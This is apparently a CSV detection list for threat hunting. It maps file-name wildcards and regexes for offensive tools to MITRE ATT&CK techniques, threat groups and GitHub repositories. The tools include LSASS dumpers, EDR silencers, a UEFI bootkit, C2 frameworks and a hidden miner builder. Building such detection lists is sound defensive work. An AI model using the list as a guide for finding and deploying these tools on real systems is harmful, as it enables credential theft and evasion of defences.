"*\DumpNParse.exe*",".{0,1000}\\DumpNParse\.exe.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","N/A","8","6","581","81","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z" "*\DumpPEFromMemory.sln*",".{0,1000}\\DumpPEFromMemory\.sln.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042????","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","0","N/A","10","3","221","48","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z" "*\DumpPEFromMemory.vcxproj*",".{0,1000}\\DumpPEFromMemory\.vcxproj.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042????","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","0","N/A","10","3","221","48","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z" "*\dumpSecrets.go*",".{0,1000}\\dumpSecrets\.go.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*\dumpsecrets_test.go*",".{0,1000}\\dumpsecrets_test\.go.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*\DumpShellcode*",".{0,1000}\\DumpShellcode.{0,1000}","offensive_tool_keyword","cobaltstrike","Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.","T1055 - T1078.003","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/PPLFaultDumpBOF","1","0","N/A","N/A","2","128","11","2023-05-17T12:57:20Z","2023-05-16T13:02:22Z" "*\DumpSomeHashesAuto.py*",".{0,1000}\\DumpSomeHashesAuto\.py.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*\DumpThatLSASS.*",".{0,1000}\\DumpThatLSASS\..{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","0","N/A","10","1","29","81","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z" "*\DumpThatLSASS\*",".{0,1000}\\DumpThatLSASS\\.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","0","N/A","10","1","29","81","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z" "*\dumpXor.exe*",".{0,1000}\\dumpXor\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","dump lsass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/seventeenman/CallBackDump","1","0","N/A","10","10","531","75","2023-07-20T09:03:33Z","2022-09-25T08:29:14Z" "*\dumpXor\x64\*",".{0,1000}\\dumpXor\\x64\\.{0,1000}","offensive_tool_keyword","cobaltstrike","dump lsass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/seventeenman/CallBackDump","1","0","N/A","10","10","531","75","2023-07-20T09:03:33Z","2022-09-25T08:29:14Z" "*\DynastyPersist\src\*.sh*",".{0,1000}\\DynastyPersist\\src\\.{0,1000}\.sh.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","N/A","9","2","132","14","2024-04-17T06:27:37Z","2023-08-13T15:05:42Z" "*\ebapc_injection.exe*",".{0,1000}\\ebapc_injection\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\ebowla.py*",".{0,1000}\\ebowla\.py.{0,1000}","offensive_tool_keyword","Ebowla","Framework for Making Environmental Keyed Payloads","T1027.002 - T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Genetic-Malware/Ebowla","1","0","N/A","10","8","724","167","2019-01-28T10:45:15Z","2016-04-07T22:29:58Z" "*\EDD.exe",".{0,1000}\\EDD\.exe","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\EDR_Detector.rs*",".{0,1000}\\EDR_Detector\.rs.{0,1000}","offensive_tool_keyword","EDR_Detector","detect EDR agents on a machine","T1518.001 - T1063","TA0007 - TA0009","N/A","N/A","Collection","https://github.com/trickster0/EDR_Detector","1","0","N/A","7","1","78","15","2021-11-05T08:10:05Z","2019-08-24T20:50:09Z" "*\edraser.py*",".{0,1000}\\edraser\.py.{0,1000}","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","172","29","2024-04-06T17:42:40Z","2023-08-10T04:30:45Z" "*\EDRSilencer.c*",".{0,1000}\\EDRSilencer\.c.{0,1000}","offensive_tool_keyword","EDRSilencer","A tool uses Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server","T1562.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/netero1010/EDRSilencer","1","0","N/A","10","9","876","119","2024-01-24T15:52:24Z","2023-12-26T04:15:39Z" "*\EfiDSEFix.cpp*",".{0,1000}\\EfiDSEFix\.cpp.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","0","N/A","10","10","1626","323","2024-01-21T06:45:07Z","2019-03-25T19:47:39Z" "*\EfiDSEFix.exe*",".{0,1000}\\EfiDSEFix\.exe.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","0","N/A","10","10","1626","323","2024-01-21T06:45:07Z","2019-03-25T19:47:39Z" "*\EfiGuard.sln*",".{0,1000}\\EfiGuard\.sln.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","0","N/A","10","10","1626","323","2024-01-21T06:45:07Z","2019-03-25T19:47:39Z" "*\EfiGuardDxe.c*",".{0,1000}\\EfiGuardDxe\.c.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","0","N/A","10","10","1626","323","2024-01-21T06:45:07Z","2019-03-25T19:47:39Z" "*\EfiGuardDxe.h*",".{0,1000}\\EfiGuardDxe\.h.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","0","N/A","10","10","1626","323","2024-01-21T06:45:07Z","2019-03-25T19:47:39Z" "*\EfiGuardDxe\X64\*",".{0,1000}\\EfiGuardDxe\\X64\\.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","0","N/A","10","10","1626","323","2024-01-21T06:45:07Z","2019-03-25T19:47:39Z" "*\Egress-Assess*",".{0,1000}\\Egress\-Assess.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*\Ekko.exe*",".{0,1000}\\Ekko\.exe.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*\elevateit.bat*",".{0,1000}\\elevateit\.bat.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","4","332","47","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z" "*\elevator.exe -*",".{0,1000}\\elevator\.exe\s\-.{0,1000}","offensive_tool_keyword","Elevator","UAC bypass by abusing RPC and debug objects.","T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Kudaes/Elevator","1","0","N/A","10","6","589","68","2023-10-19T08:51:09Z","2022-08-25T21:39:28Z" "*\Elevator\target\release*",".{0,1000}\\Elevator\\target\\release.{0,1000}","offensive_tool_keyword","Elevator","UAC bypass by abusing RPC and debug objects.","T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Kudaes/Elevator","1","0","N/A","10","6","589","68","2023-10-19T08:51:09Z","2022-08-25T21:39:28Z" "*\ELF\portscan*",".{0,1000}\\ELF\\portscan.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","0","N/A","10","10","1502","215","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*\ELF\serverscan*",".{0,1000}\\ELF\\serverscan.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","0","N/A","10","10","1502","215","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*\Elite.csproj*",".{0,1000}\\Elite\.csproj.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*\Elite.sln*",".{0,1000}\\Elite\.sln.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*\emailall.py*",".{0,1000}\\emailall\.py.{0,1000}","offensive_tool_keyword","EmailAll","EmailAll is a powerful Email Collect tool","T1114.001 - T1113 - T1087.003","TA0009 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Taonn/EmailAll","1","0","N/A","6","7","627","110","2022-03-04T10:36:41Z","2022-02-14T06:55:30Z" "*\empire_exec.py*",".{0,1000}\\empire_exec\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\enable_all_tokens.exe*",".{0,1000}\\enable_all_tokens\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\EnableAllTokenPrivs.cs*",".{0,1000}\\EnableAllTokenPrivs\.cs.{0,1000}","offensive_tool_keyword","EnableAllTokenPrivs","Enable or Disable TokenPrivilege(s)","T1134 - T1055","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/xvt-void/EnableAllTokenPrivs","1","0","N/A","7","1","11","3","2024-02-18T20:55:05Z","2024-02-17T15:39:25Z" "*\EnableAllTokenPrivs.exe*",".{0,1000}\\EnableAllTokenPrivs\.exe.{0,1000}","offensive_tool_keyword","EnableAllTokenPrivs","Enable or Disable TokenPrivilege(s)","T1134 - T1055","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/xvt-void/EnableAllTokenPrivs","1","0","N/A","7","1","11","3","2024-02-18T20:55:05Z","2024-02-17T15:39:25Z" "*\EnableAllTokenPrivs.ps1*",".{0,1000}\\EnableAllTokenPrivs\.ps1.{0,1000}","offensive_tool_keyword","EnableAllTokenPrivs","Enable or Disable TokenPrivilege(s)","T1134 - T1055","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/xvt-void/EnableAllTokenPrivs","1","0","N/A","7","1","11","3","2024-02-18T20:55:05Z","2024-02-17T15:39:25Z" "*\Enable-DuplicateToken.ps1*",".{0,1000}\\Enable\-DuplicateToken\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*\enc_shellcode.bin*",".{0,1000}\\enc_shellcode\.bin.{0,1000}","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","0","N/A","10","2","159","22","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z" "*\enc_shellcode.h*",".{0,1000}\\enc_shellcode\.h.{0,1000}","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","0","N/A","10","2","159","22","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z" "*\enc-rot13.ps1*",".{0,1000}\\enc\-rot13\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\encryption_aes.exe*",".{0,1000}\\encryption_aes\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\encryption_rc4.exe*",".{0,1000}\\encryption_rc4\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\enterprise_admins.txt*",".{0,1000}\\enterprise_admins\.txt.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","0","N/A","5","4","356","98","2024-02-26T14:05:08Z","2018-04-20T11:29:06Z" "*\enum_av.py*",".{0,1000}\\enum_av\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\enum_dns.py*",".{0,1000}\\enum_dns\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\enum4linux.py*",".{0,1000}\\enum4linux\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\EnumBrowsers.ps1*",".{0,1000}\\EnumBrowsers\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\enumeration_process.exe*",".{0,1000}\\enumeration_process\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\ES.Alan.Core*",".{0,1000}\\ES\.Alan\.Core.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*\EternalHushCore.dll*",".{0,1000}\\EternalHushCore\.dll.{0,1000}","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","0","N/A","10","10","3","0","2023-10-28T13:08:06Z","2023-07-09T09:13:21Z" "*\EternalHushCore\*",".{0,1000}\\EternalHushCore\\.{0,1000}","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","0","N/A","10","10","3","0","2023-10-28T13:08:06Z","2023-07-09T09:13:21Z" "*\ethminer.exe*",".{0,1000}\\ethminer\.exe.{0,1000}","offensive_tool_keyword","SilentCryptoMiner","A Silent (Hidden) Free Crypto Miner Builder","T1496 - T1055 - T1546 - T1082 - T1574","TA0042 - TA0005 - TA0003 - TA0009","N/A","N/A","Cryptomining","https://github.com/UnamSanctam/SilentCryptoMiner","1","0","N/A","9","10","1032","252","2024-04-11T01:25:28Z","2021-11-08T09:03:32Z" "*\etw-fuck.cpp*",".{0,1000}\\etw\-fuck\.cpp.{0,1000}","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense 